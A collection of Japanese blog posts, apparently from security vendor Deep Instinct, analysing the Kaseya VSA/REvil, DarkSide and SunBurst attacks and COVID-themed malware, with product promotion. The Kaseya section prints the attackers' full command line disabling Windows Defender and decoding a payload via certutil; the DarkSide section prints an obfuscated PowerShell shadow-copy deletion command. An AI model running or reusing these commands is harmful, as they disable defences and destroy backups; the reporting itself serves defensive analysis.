SolarWinds 社の SunBurst 攻撃に続き、Kaseya 社も新たなサプライチェーン攻撃の的となりました。この金曜日、Kaseya 社は、クライアントにネットワーク上のマシンへのリモートコントロールアクセスを提供する同社の <a href="https://www.kaseya.com/products/vsa/">VSA 製品</a> が侵害され、Kaseya クライアントのネットワーク環境がランサムウェアに感染させるために使用されたことを発表しました。同社は、すべてのクライアントに対し、VSA サーバを直ちにシャットダウンするよう通知しました。これまでにわかっていることは以下の通りです。Kaseya VSA は、製品内のまだパッチが適用されていないゼロデイ脆弱性を利用して攻撃されました。VSA にアクセスした後、攻撃者は「Kaseya VSA Agent Hot-fix」と呼ばれる偽の悪意のある自動アップデートを作成し、それを Kaseya のクライアント ネットワークにある VSA サーバにプッシュしました。Kaseya VSA の管理アクセスは、侵害されたサーバに対して無効にされ、悪名高い REvil  (別名 Sodinokibi) ランサムウェアがネットワーク上の他のマシンに配信されました。さらに最悪なことに、この攻撃を受けた Kaseya の顧客の何社かは、マネージドサービスプロバイダ (MSP) でした。その結果、攻撃は彼らの顧客のネットワークの一部に影響を与えました。たとえこれらの MSP のクライアントネットワークが Kaseya VSA を持っていなかったとしても、ランサムウェアに感染する可能性があります。この偽のアップデートは、管理されているすべてのシステムに自動的にインストールされ、「agent.crt」と呼ばれるファイルをKaseya の一時フォルダ（デフォルトでは「c:\kworking」）に配信しました。その後、PowerShell コマンドを使用して Microsoft Windows Defender の機能の多くを無効にし、正規の「certutil.exe」を使用して「agent.crt」をデコードし、「agent.exe」を同じフォルダに展開しました。ping 127.0.0.1 -n 4979 &gt; nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% &gt;&gt; C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe Microsoft Windows Defender の機能を無効にし、"agent.crt "をデコードした PowerShell コマンド「agent.exe 」は、「PB03 TRANSPORT LTD 」の証明書で署名されており、「MsMpEng.exe 」という正規の Microsoft Windows Defender の実行ファイルと、REvil の暗号化ツールである 「mpsvc.dll 」の2つのファイルが埋め込まれていました。そしてこのマルウェアは、DLL サイドローディングと呼ばれる手法を用いて、配信された Windows Defender の実行ファイルにランサムウェアの DLL を実行させました。この戦術は、暗号化プロセスを正規のソフトウェアを介して実行させることを目的としており、実行される可能性が高いのが事実です。通常、REvil は二重恐喝と呼ばれる方法で被害者に身代金の支払いを迫ります。感染した組織はデータを暗号化されますが、暗号化される前にデータの一部が盗まれており、期限内に全額の身代金を支払わないとデータを公開すると脅されます。しかし、当初は、攻撃者はこの手法を取らず、ファイルを暗号化してバックアップを削除し、感染した企業が身代金を支払った後ファイルを復旧させることを選択したと考えられています。被害状況の把握Kaseya は、この攻撃によって影響を受けた企業が 40 社以下であると主張していますが、そのクライアントの多くが複数のクライアントを持つ MSP であることを考えると、被害の影響範囲は計り知れません（現在報告されているものよりもはるかに広範囲であると思われます）。現在のところ、Kaseya の MSP クライアントのうち 20 社が REvil に感染したと推定されており、影響を受けた企業の数は少なくとも 200 社ですが、より多くの企業が被害を受けたことを公表すれば、すぐに数千にものぼる可能性があります。最初に被害を受けたことを公表した企業は、スウェーデンのスーパーマーケット チェーンである Coop で、彼らのネットワークに REvil が侵入した結果、レジとセルフサービスのチェックアウトが使用できなくなり、800 の店舗を閉店せざるを得なくなりました。このスーパーマーケットが感染したのは、同社の支払システムを管理しているスウェーデンの MSP である Visma 社がKaseya の顧客であり、侵害の結果として危険にさらされたからです。この攻撃は、ランサムウェア攻撃のよる被害のより広い意味を示しています。最初は 1 社のみがターゲットかもしれませんが、感染を阻止するための適切な検出および防止ツールがなければ、感染はすぐに接続された組織やネットワークに広がる可能性があります。まとめ今のところ、VSA のセキュリティホールに対するパッチはありません。Kaseya のお客様は、さらなる感染を防ぐために、VSA サーバをシャットダウンすることをお勧めします。予防第一のアプローチは、ランサムウェアに対する最高の抑止力となります。Deep Instinct では、既知のランサムウェアとゼロデイランサムウェアの両方を実行前に検出して防止し、ファイルに感染する前に停止させます。300 万ドルの保証付きでランサムウェアを阻止するための業界最先端のアプローチについての詳細をご希望の方は、当社の新しい eBook「 <a href="https://info.deepinstinct.com/tof/ransomware-prevention?_ga=2.223863323.1640784929.1625532656-458915699.1615814126&_gac=1.51979611.1624350856.CjwKCAjwjbCDBhAwEiwAiudByxaLTLLnZ1hyUC_gDsBp4rDRQt20W4nLoUj63hEOLD9sE5AOuO0DKxoC0ngQAvD_BwE">ランサムウェア：事後対応より予防が大事 </a>」をご覧ください。また、実際のデモをご希望の方は、<a href="/request-demo/" target="_self">こちらから</a> お問い合わせください。コンプロマイズの指標 d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e - agent.exe df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e - agent.exe dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f - agent.exe aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7 - agent.exe 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8 - agent.exe 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471 - agent.exe 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e - agent.exe 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd - mpsvc.dll e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 - mpsvc.dll d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20 - mpsvc.dll d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f - mpsvc.dll cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6 - mpsvc.dll 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402 - mpsvc.dll 8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f - mpsvc.dll

Kaseya VSA への REvil ランサムウェア攻撃を解説

Image-from-iOS.jpeg

米国のミッションクリティカルな燃料パイプラインを停止させたコロニアル・パイプライン社のランサムウェア事件については、もうほとんどの方がご存知のことと思います。侵入とそれに伴うサービスの停止により、同社は数日間にわたってオフラインになり<a href="https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636">440万ドルの身代金</a> を支払いました。ランサムウェアが米国のみならず世界中で注目を集めているのは、その攻撃が対象となる企業に深刻なビジネス上の影響を与えるだけでなく、その頻度や規模が拡大しているためです。この記事では、DarkSide攻撃の背景について説明します。注目されているDarkSide の Ransomware-as-a-Service (RaaS)DarkSideは、2020年8月に初めて発見されて以来、これまでに15カ国以上で見つかっています。「Darksupp」というニックネームで販売されているDarkSideは、ランサムウェアがダークネットサイトで販売され拡大している Ransomware-as-a-Service（RaaS）と呼ばれるトレンドの１つです。DarkSide自体も、ロシアのダークネットフォーラム exploit.in や xss.is に掲載されていました。ここ数年、RaaSの勢いは増しており、「SATAN」をはじめとする世の中で多発しているランサムウェア攻撃のいくつかは、同様に同じところから生まれています。このRaaSモデルでは、購入者である「アフィリエイター」にインターフェースが提供され、そこから独自のDarkSideバリアントのコスチュームを作成したり、被害者を管理したり、DarkSideブログのコンテンツを書いたりすることができます。アフィリエイトは、身代金支払いの際に、身代金の要求額に応じた割合で、マルウェアの作成者に出資します。報告されている攻撃シナリオでは、アフィリエイターまたはDarkSideの作成者自身である可能性のある攻撃者が、組織のVPNの既知の脆弱性を利用したり、正規ユーザーの資格情報を使用したりするなど、さまざまな方法で組織に侵入します。一度侵入されると、DarkSideのペイロードがダウンロードされ、ローカルおよびネットワークドライブ上のさまざまな場所にコピーされます。被害者であるPatient Zeroが完全に感染すると、脅威の主体はネットワークの聖杯である <a href="https://en.wikipedia.org/wiki/Domain_controller">Domain Controller (DC)</a>を探し始めます。目的の場所に到着すると、攻撃者はさらに機密情報やファイルを収集します。また、 <a href="https://en.wikipedia.org/wiki/Security_Account_Manager">SAM レジストリハイブ</a>をダンプして、パスワードを抽出することも可能です。侵入が完了した後、DCがマルウェアに感染するだけでなく、関連するネットワークにも感染します。攻撃者は、このマルウェアを利用して、ネットワーク内の他のターゲットを感染させることが可能になります。最後に、Windowsのスケジュールタスクなどの実行メカニズムによってランサムウェアのペイロードが実行されますが、これについては後ほど詳しく説明します。被害者は、通常、デスクトップや感染したフォルダに置かれた身代金請求書によって攻撃の事実を知ることになります。被害を受けた企業が身代金の支払いを拒否した場合、データは暗号化されたままとなり、攻撃者は盗んだファイルや情報を一般に公開する可能性があります。DarkSideを光に変える - コロニアル・パイプラインの攻撃とその結果2021年5月7日、コロニアル・パイプライン社がDarkSideに攻撃されました。同社が運営するパイプライン（同名）は、米国東海岸への供給に使用される燃料の45％を運んでいるため、このパイプラインが寸断されると、必ず燃料やサプライチェーンの問題が発生します。攻撃の矛先は同社のデータシステムに向けられました。コロニアル・パイプライン社は、より大きな被害や混乱を避けるために、運用技術システムを無効にすることを選択しましたが、この決断が被害をより大きくする原因となりました。もしネットワークを分離するソリューションを導入していれば、ランサムウェアが業務システムまで被害を及ぼすような決断には至らなかったかもしれません。これにより、米国で最も人口の多い地域への燃料やガソリンの供給が脅かされただけでなく、ガソリンの不足、ガソリンスタンドの長蛇の列、パニック、価格の高騰などの事態が発生しました。攻撃を受けた同日、民間企業であるコロニアル・パイプライン社は、身代金の支払いをするべきではないというFBIの指示（多額のランサムウェアの支払いは、さらなるランサムウェアの攻撃と多額のランサムウェアの支払いを誘発するだけだという論理です）には従わず、身代金約440万ドルをビットコインで支払うことを選択しました。攻撃から5日後の5月12日、同社はパイプラインの復旧に成功し、その後、通常の活動を再開しました。しかし、今回の攻撃の影響はもっと長く続くでしょう。この攻撃がガスの供給、事業の運営、消費者の信頼、さらには相互につながっている大規模なサプライチェーンに連鎖的に影響を与えたことから、ランサムウェアは企業経営者や米国政府からも注目されています。攻撃を受けた数日後、DarkSideはバイデン米国大統領の標的となり、DarkSideのウェブサイトはすぐに閉鎖されました。さらなる反響と調査を恐れたDarkSideと、同月にワシントンD.C.警察を攻撃したBabukを含む他のランサムウェアグループは、その週の終わりに解散を発表しました。DarkSideサンプルの分析DarkSideのRaaSモデルは、アフィリエイトが独自のランサムウェアのビルドを作成し、独自の裁量で攻撃を指揮できるインフラを提供します。アフィリエイトは、このコンソールを使用して、暗号化モードの選択、被害者がCIS諸国の出身かどうかを判断するための言語チェックの実行の有無、ネットワークドライブの暗号化の無効化または有効化、シャドーコピーの削除など、自分のバリアントがどのように動作するかを決定することができます。ここで言及されている分析済みサンプルは、特に指定のない限り、SHA256値が 6931b124d38d52bd7cdef48121fda457d407b63b59bb4e6ead4ce548f4bbb971 です。この DarkSide 亜種が実行されると、実行元のディレクトリに LOG.victim_extension.TXT と呼ばれる、自分の行動を記録するファイルが作成されます。「victim_extension」は、DarkSideの亜種が生成する8文字の疑似乱数文字列で、感染したマシン上の暗号化ファイルの拡張子として使用されます。この文字列は、身代金ファイルとログファイルの名前にも使用されます。<img src="https://deepinsarchive.wpengine.com/wp-content/uploads/2021/06/ransomeware-darkside-blog-1.png" width="657" style="width: 657px; height: auto;" max-width="657"/> 図1：DarkSideのログファイル上の画像に見られるように、暗号化を開始する前に、DarkSide は暗号化されたファイルがローカルのバックアップで置き換えられないようにいくつかの対策を取りました。バックアップサービスをアンインストールし、暗号化したいファイルのハンドルを持つ特定のプロセスを終了させ、ごみ箱を空にし、最後の仕上げとして以 下の PowerShell コマンドを使用してシャドウコピーを削除しました。powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20 466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2* $_,2))};iex $s"変数「s」には以下のものが含まれていました：Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}次に、ファイルシステム上のすべてのファイルの暗号化を開始しました。ただし、"Windows"、"ProgramData"、"AppData"などの特定のディレクトリに存在し、"exe"、"bat"、"bin"などの特定の種類のファイルや、"thumbs.db"、"netuser.dat"などの無視できる名前のファイルは除きます。ランサムウェアが訪れたすべてのディレクトリに、次のようなランサムノートが投下されました：<img src="https://deepinsarchive.wpengine.com/wp-content/uploads/2021/06/ransomeware-darkside-blog-2.png" width="657" style="width: 657px; height: auto;" max-width="657"/> 図2：DarkSideのランサムノート前述のとおり、DarkSide のウェブサイトは停止していたため、自動的に生成された URL はどのページにもつながっておらず、実際にはデータは流出していませんでした。仮にサーバーがまだ稼働していたとしても、100GBのデータが盗まれることはありませんでした。なぜなら、使用されたファイルシステムにはこのような量のデータは含まれておらず、分析したところ、リモートサーバーへの接続を試みた形跡は見つからなかったからです。この数字は、少なくとも解析対象ごとに固定されたものであり（他の解析対象では、400GBなど異なる量のデータが盗まれたとされています）、盗まれたデータの量を推測する上ではあてにならないと考えてよいでしょう。Deep Instinct vs DarkSideDeep Instinctのエンドポイントソリューションは、DarkSideの亜種の実行を、当社の深層学習脳を介した静的なものと、行動分析メカニズムを介した動的なものの両方で防止します。このように、Deep Instinctは、既知および未知のすべてのランサムウェア攻撃に対して、世界で最も高度な防止策を提供します。<img src="https://deepinsarchive.wpengine.com/wp-content/uploads/2021/06/ransomeware-darkside-blog-3.png" width="657" style="width: 657px; height: auto;" max-width="657"/> 図3：DarkSideでの静的防止イベント<img src="https://deepinsarchive.wpengine.com/wp-content/uploads/2021/06/ransomeware-darkside-blog-4.png" width="657" style="width: 657px; height: auto;" max-width="657"/> 図4：シャドーコピーの削除に使用されたPowerShellコマンドが悪意のあるものと認識され、防止された<img src="https://deepinsarchive.wpengine.com/wp-content/uploads/2021/06/ransomeware-darkside-blog-5.png" width="657" style="width: 657px; height: auto;" max-width="657"/> 図5：DarkSideは、ファイルが暗号化される前に、特定されたランサムウェアの動作によって防止されたまとめRaaSを利用した攻撃はまだ終わっていません。単独のハッカーや大規模なシンジケートの技術や専門知識が洗練されていくにつれ、より多様で邪悪なランサムウェア攻撃が発生する可能性があります。そして、攻撃のターゲットとなる企業はより増大し、身代金に充てる膨大な資金がブランドに影響を与える可能性があります。しかし、ランサムウェアには解決策があります。Deep Instinctを使ってランサムウェアを予測・予防し、システムや業務に影響を与える前に食い止めることができるのです。DarkSideはコロニアル・パイプライン社に大きな傷跡を残し、収益と評判に多大な損害を与えました。ランサムウェアを防ぐために、セキュリティ対策に投資し、ネットワーク防御をよりよく準備しましょう。300万ドルの保証付きでマルウェアを阻止するための業界最先端のアプローチについて詳しく知りたい方は、当社の新しいeBook 「<a href="https://info.deepinstinct.com/tof/ransomware-prevention?_ga=2.99070299.453200457.1622600658-1453025447.1612830865">Ransomware: Why Prevention is better than the Cure </a> 」をダウンロードしてください。

ランサムウェアの難問 - DarkSideを詳しく見る

The SunBurst trojan was first reported on December 8th, 2020, and has been making headlines ever since. The Sunburst malware is significant both for i

sunburst-malware.png

<a rel="noopener noreferrer" href="https://www.deepinstinct.com/blog/sunburst-trojan-what-you-need-to-know">トロイの木馬「SunBurst」</a>は、2020年12月8日に初めて報告されて以来、話題になっています。Sunburst マルウェアは、戦略的で高度に発達した悪意のあるロジックと、大企業ををターゲットにしているという点で注目されました。
2015年にカスペルスキーへの侵入に成功したDuqu 2.0という国家的攻撃を彷彿させる Sunburst 攻撃の高度さは、綿密な研究開発を行うだけの十分な資金力を持った国家グループであることを示しています。このことは、バックドアをホストするための主要ターゲットとして Orion を特定したことや、2020 年の数ヶ月間、検出を回避することに成功した他の多重回避技術を見ても明らかです。
不正アクセスを受けた SolorWinds の製品である Orion は、Fortune 500 企業や連邦政府機関を含む約 33,000 の公共部門および民間部門の顧客に利用されていました。そのため顧客の何百万ものデータが漏洩し、この出来事は広く社会的関心を集めることになりました。
この記事では、攻撃の流れをより詳細に説明するとともに、SunBurst との戦いにおける新たな展開についても紹介します。<h3>攻撃の流れ</h3>
攻撃者は、Orion のソフトウェアアップデートを構築するための SolarWinds のソフトウェア開発フレームワーク/インフラストラクチャに静かに侵害し、アップデートパッケージ、特に「SolarWinds.Orion.Core.BusinessLayer.dll」というコンポーネントにパッチを当てることができました。
他のアップデートと同様に、感染した Orion Windows Installer パッチは、SolarWind 社の公式ウェブサイトでユーザーがダウンロードできるようになっていました。
感染したパッチインストーラーが実行されると、パッチが意図する正当な機能が実行されますが、攻撃者のコードも実行されました。感染した DLL が呼び出されると、そこに脅威のアクターによって挿入された悪意のあるコードによって、正規のタスクが実行されるたびに SunBurst のバックドアが実行されるようになっていました。
短期的には、バックドアは 12 日から 14 日間、休眠状態にありました。反復タスクがバックドアを実行するたびに、指定された期間が経過したかどうかを確認し、経過していなければ悪意のある部分を実行しませんでした。
一定期間が経過すると、バックドア関連のコードは、実行中のプロセスのリストを、セキュリティ分析やウイルス対策に関連するプロセス名、ドライバーパス、サービスなどのコード化されたブラックリストと比較するなど、一連のテストを行いました。ブラックリストに登録されたプロセスが実行されていた場合、そのプロセスを無効にして SunBurst バックドアマルウェアを再起動させようとします。
システムが実行前のテストにすべて合格すると、マルウェアはその実行環境と居住するドメインに関する情報を収集し、この情報をコマンド＆コントロール（C&C）サーバーに送信します。このデータは、感染したマシンのドメイン名をエンコードしたものが含まれているため、ユーザーごとに固有の URL に送信されました。この URL は、avsvmcloud[.]com のサブドメインでした。SunBurst は、要求されたドメインに対して返された IP もチェックし、それが特定の範囲内であれば、マルウェアは自らを終了させ、それ以上の実行が行われないようにしました。
C&C サーバーを利用することで、攻撃者はエンドユーザー向けのマルウェアに、被害者のマシンで実行するコマンドを返信することができました。あるドメインが特に興味深いものであると判断した場合、バックドアを使って別の C&C サーバーに接続するように命令し、そこからさらにコマンドを実行したり、より多くのマルウェアサンプルをダウンロードしたりすることができました。<h3>回避メカニズム</h3>
攻撃者は検知を逃れるために様々な工夫を凝らすため、彼らの活動が発見されるまでに数ヶ月を要しました。このマルウェアは、12日から14日の間休眠状態となり、特定のセキュリティプロセスが実行されている間は悪意のある活動を行わないようにしたほか、C&C インフラストラクチャのホスト名を被害者の環境にある正当なホスト名と一致させました。これにより、マルウェアはより効果的に環境に溶け込むことができ、異なるホスト名を使用した場合にセキュリティアナリストが警告を発するような疑惑を回避することができました。さらに、SunBusrt のネットワーク活動は、Orion Improvement Program（OIP）プロトコルから来ているように見せかけ、マルウェアは偵察情報を正規のプラグイン設定ファイル内に保存していたため、SolarWinds の正規の活動に紛れ込むことができました。また、攻撃者は被害者と同じ国の IP アドレスを使用し、国外の IP アドレスは疑われる可能性があるため、仮想プライベートサーバを使用していました。<h3>Microsoft vs. SunBurst</h3>
この攻撃が最初に報告されて以来、マイクロソフト社はこのマルウェアに対して実質的な対策を講じ、無力化するための重要な役割を果たしてきました。まず、同社は侵害された DLL の署名に使用されていた電子証明書を削除しました。これにより、Windows システムはこの DLL を信用しなくなり、一部の実行が失敗することが意図されています。次に、Windows Defender がこのマルウェアを検出し、感染したマシンにその存在を警告するように設定しました。
12月15日、マイクロソフトとそのパートナーは、攻撃者に対して法的措置を取り、マルウェアの C&C サーバーとして使用されていたドメイン「avsvmcloud[.]com」を閉鎖しました。このドメインは現在、マイクロソフトが管理する IP にリダイレクトされており、マイクロソフトとそのパートナーは、この IP に接続があるかどうかを監視し、侵害された組織に侵害について通知しています。
前述のように、エンドユーザーバックドアは、C&C ドメインのために返された IP をチェックし、それが一定の範囲内にある場合は、「キルスイッチ」が作動し、マルウェアは自らを終了させ、それ以降の実行計画はキャンセルされます。マイクロソフト社は、C&C ドメインとして返される IP を、この「キルスイッチ」をオンにするものに設定していることを知っています。しかし、FireEye 社は、同社が調査したケースでは、攻撃者が追加の持続的メカニズムを確立していたが、このアクションの影響を受けなかったと警告しています。彼らの調査によると、攻撃者はこのバックドアがなくても被害者のマシンに接続する方法を持っています。
さらに、12月16日、マイクロソフト社は、SunBurst に対する Windows Defender のアプローチを「警告」から「隔離」に変更しました。<h3>新しいマルウェア</h3>
この攻撃は、その複雑さ、重要性、そして公表性から、多くの人が分析を試みました。ここ数日、侵害された Orion ソフトウェアのサンプルを分析しているうちに、「Supernova」と名付けられた新しいバックドアが発見されたことが報告されました。SunBurst に似た Supernova は、パーシステンス・メカニズムとして使用されるように作られたバックドアです。今回発見されたマルウェアは、ファイルレスで、メモリ上でコンパイル、実行されるため、セキュリティ製品での検出が困難です。現時点では、Supernova の詳細は不明ですが、SunBurst の配信に使用された DLL とは異なり、Supernova の配信に使用された DLL は、正規の SolarWinds の証明書で署名されていないことから、SunBurstとは無関係の攻撃の一部であると考えられています。<h3>被害の増大</h3>
最近になって、さらに多くの組織で SunBurst による攻撃が確認されました。12月17日、FBI、DHS-CISA、および国家情報長官室（ODNI）は、共同声明の中で、バックドアが米国連邦政府のネットワークに影響を与えたことを確認しました。VMWare 社は12月21日、同社のネットワークもこの攻撃を受けたことを確認しましたが、攻撃者がネットワークへのアクセスをさらなる悪意のある目的に使用したことはないと主張しています。マイクロソフト社も、同社のネットワークでバックドアの亜種を発見したことを確認しましたが、攻撃者が顧客データにアクセスしたり、同社の製品を危険にさらしたりした証拠はないと主張しています。
前述のとおり、SunBurst のバックドアは、侵入したドメイン名がエンコードされた固有の URL に接続します。このマルウェアが生成したサブドメインのリストを解読、分析した結果、有名な組織の名前を見つけることができました。その中には、Cisco、Intel、Mediatek などの名前が含まれています。
<a href="https://www.deepinstinct.com/ja" target="_blank" rel="noopener noreferrer">Deep Instinct</a>&nbsp;は、新たな動きを警戒し、お客様のシステムを危険にさらそうとする悪意のあるファイルからお客様を確実に保護するために全力を尽くしています。私たちは、関連するすべてのIoCを拡大して監視し、Deep Instinctの高度なエンドポイント保護ソリューション&nbsp;<a href="https://www.deepinstinct.com/ja/endpoint-security" target="_blank" rel="noopener noreferrer">高度なエンドポイント保護ソリューション</a>&nbsp;がそれらから保護することに注力しています。

マルウェア「Sunburst」がユニークな理由とそこから学んだこと

Since the outbreak of COVID-19, plenty of COVID-19 themed malware attacks have surfaced around the globe. Attackers take every chance they get to spre

malware-pandemic.jpg

新型コロナウィルスが発生して以来、 世界中で 新型コロナウィルス<a href="https://www.deepinstinct.com/ja/blog/attackers-abuse-the-covid-19-pandemic-to-spread-malware" target="_blank" rel="noopener noreferrer">&nbsp;新型コロナウィルステーマにしたマルウェアの攻撃</a>&nbsp;が数多く発生しています。攻撃者は、マルウェアを拡散するためにあらゆる機会を利用しますが、コロナ禍では彼らにより絶好の機会を与えています。
Deep Instinct 社のスレットインテリジェンス、テレメトリークラウド環境である D-Cloud のデータによると、攻撃の数は全体的に増加しています。特に、悪意のある実行ファイルや、前者の配信によく使われる Office 文書の数が増加しています。これは、コロナ禍のマルウェアの攻撃や悪意のある活動の増加と関連があると考えています。このデータは、他の地域で見られる傾向と一致しており、コロナ禍始まって以降、攻撃が増加していることを示しています。例えば、2020 年前半に確認された悪意のある Office 文書の量は、2019 年前半に確認された同種のファイルの量よりも 62% 多くなっています。この増加は、この種のファイルをよく使用する新型コロナウィルスフィッシング攻撃の波と相関しています。2019 年と 2020 年の同時期の比較では、悪意のある実行ファイルの数が 40% 増加しています。<img src="https://deepinsarchive.wpengine.com/wp-content/uploads/2020/10/Malware-samples-per-month.jpg" width="860" height="500" data-image="pzeklidyo93r">
図 1 ：2019 年に入ってからの、月ごとの新しいマルウェアサンプルの数。グラフでは、Microsoft Office 文書を、古い形式である OL Eと、新しい形式である OOXML に分けています。数字は任意の単位で示されており、2019 年 1 月の悪意のある OOXML ファイルの数を 1 としています。
コロナ禍当初、攻撃者はフィッシング キャンペーンや不正なスパム攻撃に力を注ぎ、時には&nbsp;<a href="https://www.who.int/mediacentre/news/statements/2006/s01/en/" rel="noopener noreferrer" onclick="javascript:window.open('https://www.who.int/mediacentre/news/statements/2006/s01/en/'); return false;">世界保健機関（WHO）</a>などの正当な情報源を装いました。また、比較的安全だった企業のネットワークから、安全性の低い場所からアクセスできるようになったリモートワークを悪用する者もいました。同様に、今までは非公開で行われていた会議が、脆弱な仮想通信アプリを使って行われるようになりました。<h3>善良な人々を標的に</h3>
コロナ禍の戦いで最前線に立つ組織は、この困難な時期にマルウェアに狙われるようなことを考えたくはないのは当然ですが、残念ながらそうもいきません。
新型コロナウィルスが発生して以来、医療機関とその従業員は例年以上に標的にされており、<a href="https://securitytoday.com/articles/2020/03/26/world-health-organization-facing-cyber-attacks-during-coronavirus-response.aspx" rel="noopener noreferrer" onclick="javascript:window.open('https://securitytoday.com/articles/2020/03/26/world-health-organization-facing-cyber-attacks-during-coronavirus-response.aspx'); return false;">WHO</a>&nbsp;を狙った標的型サイバー攻撃は、昨年の 2 倍以上に増加しています。スパムやフィッシングのキャンペーンが展開され、中には個人や企業のメールアドレスを介して WHO のトップ職員を特に狙ったものもありました。また、医療従事者向けの偽のログインサイトも作成され、その中には世界保健機関の永遠のメールシステムを模倣したものもありました。
一部の脅威アクターは、パンデミック時に医療機関を標的にしないと<a href="https://virsec.com/maze-and-other-ransomware-groups-say-they-wont-attack-hospitals-during-covid19-outbreak-but-how-trustworthy-is-their-word/" rel="noopener noreferrer" onclick="javascript:window.open('https://virsec.com/maze-and-other-ransomware-groups-say-they-wont-attack-hospitals-during-covid19-outbreak-but-how-trustworthy-is-their-word/'); return false;">当初表明していましたが</a>&nbsp;、全ての脅威アクターがその約束を守った訳ではありません。例えば、悪名高いランサムウェア「Maze」を開発したグループは、2020 年 3 月に「コロナ禍では医療施設や研究所への感染を避ける」という声明を発表しました。しかし、そのわずか数日後、彼らはロンドンにあるワクチンを開発している研究所「Hammersmith Medicines Research」から&nbsp;<a href="https://www.computerweekly.com/news/252480425/Cyber-gangsters-hit-UK-medical-research-lorganisation-poised-for-work-on-Coronavirus" rel="noopener noreferrer" onclick="javascript:window.open('https://www.computerweekly.com/news/252480425/Cyber-gangsters-hit-UK-medical-research-lorganisation-poised-for-work-on-Coronavirus'); return false;">盗んだデータ</a>を公開しました。それだけではなく、Maze はさらに多くの医療機関に感染し、業務を妨害するだけでなく、身代金を支払わなければ患者の情報をオンラインで公開すると脅しました。脅迫を受ければ、感染した医療機関は高額な GDPR 訴訟にさらされることになります。<h3>Come and Knock on Our Door</h3>
企業が従業員に、安全性の高いオフィスから、安全性の低い自宅での仕事を推奨したことで、ハッカーの仕事は格段に楽になりました。企業のセキュリティ ソリューションを通過するようなマルウェア・サンプルを作るために努力する必要はもはやなく、無防備な従業員に悪意のあるメールの添付ファイルを開かせたり、インターネットからマルウェアをダウンロードさせたりするだけでよいのです。在宅勤務への移行によって深刻な影響を受けた組織の例として、フォーチュン 500 社に選ばれている&nbsp;<a href="https://www.crn.com/news/channel-programs/cognizant-contains-maze-ransomware-attack-as-cleanup-costs-spiral?itc=refresh" rel="noopener noreferrer" onclick="javascript:window.open('https://www.crn.com/news/channel-programs/cognizant-contains-maze-ransomware-attack-as-cleanup-costs-spiral?itc=refresh'); return false;">コグニザント社</a>が挙げられます。同社がリモートワーク環境に慣れてきた頃、ランサムウェア「Maze」による攻撃を受けました。復旧・修復にかかった費用は莫大で、5,000 万ドルから 7,000 万ドルと見積もられています。
多くの人が仕事とプライベートで同じPCを使用し、時には家族間でも同じデバイスを共有しているという事実は、さらに多くの悪意のあるサンプルに門戸を開くことになります。
さらに、ゲームに力を入れようと考えたマルウェア開発者は、より多くの人に攻撃するために、コロナ禍に利用が増えたアプリやサービスに悪用できる脆弱性を探し始めました。その一例が「Zoom」です。Zoom は人気が爆発した後、相次いでセキュリティ問題に見舞われました。その一つが、 4 月に発生したデータ流出事件で、50 万件以上の Zoom の認証情報が流出し、脆弱なエンドポイントで任意のコードが実行される脆弱性が発見されました。<h3>偽のAndroidアプリ</h3>
多くの組織や政府が、新型コロナウィルスに関する最新情報をユーザーに提供するアプリケーションを立ち上げました。これを機に、サイバー犯罪者たちは、このアプリケーションの急増を利用して、有用性が低く、有害性の高い独自のバージョンを立ち上げました。よくあるのは「新型コロナウィルス トラッカー」と呼ばれるアプリで、感染者の過去の経路や現在地などの情報を提供するものです。
コロナ禍では、バンキングトロイの木馬「Ginp」がトラッカーを装った Android アプリを起動し、ユーザーが現在いる地域の（偽）の感染者数を表示しました。このソフトウェアは、0.75 ユーロで感染者の詳細情報を提供できると宣伝していました。ユーザーが登録すると、クレジットカード情報の入力が求められます。もちろんその情報は Ginp によって盗まれ、カードに課金されたことも、求められた情報を提供されることはありませんでした。
トラッカーのテーマを悪用したもう一つのマルウェアが CryCryptor です。2020 年 6 月 18 日、&nbsp;<a href="https://pm.gc.ca/en/news/news-releases/2020/06/18/prime-minister-announces-new-mobile-app-help-notify-canadians-covid" rel="noopener noreferrer" onclick="javascript:window.open('https://pm.gc.ca/en/news/news-releases/2020/06/18/prime-minister-announces-new-mobile-app-help-notify-canadians-covid'); return false;">カナダ政府</a>&nbsp;は、新型コロナウィルスの詳細を提供する追跡アプリの開発を支援すると発表しました。そのわずか数日後、CryCryptor は、そのアプリのふりをしたランサムウェアを起動しました。この偽アプリへのリンクは、攻撃者が作成したコロナウイルスをテーマにした 2 つのウェブサイトで見つけることができました。&nbsp; 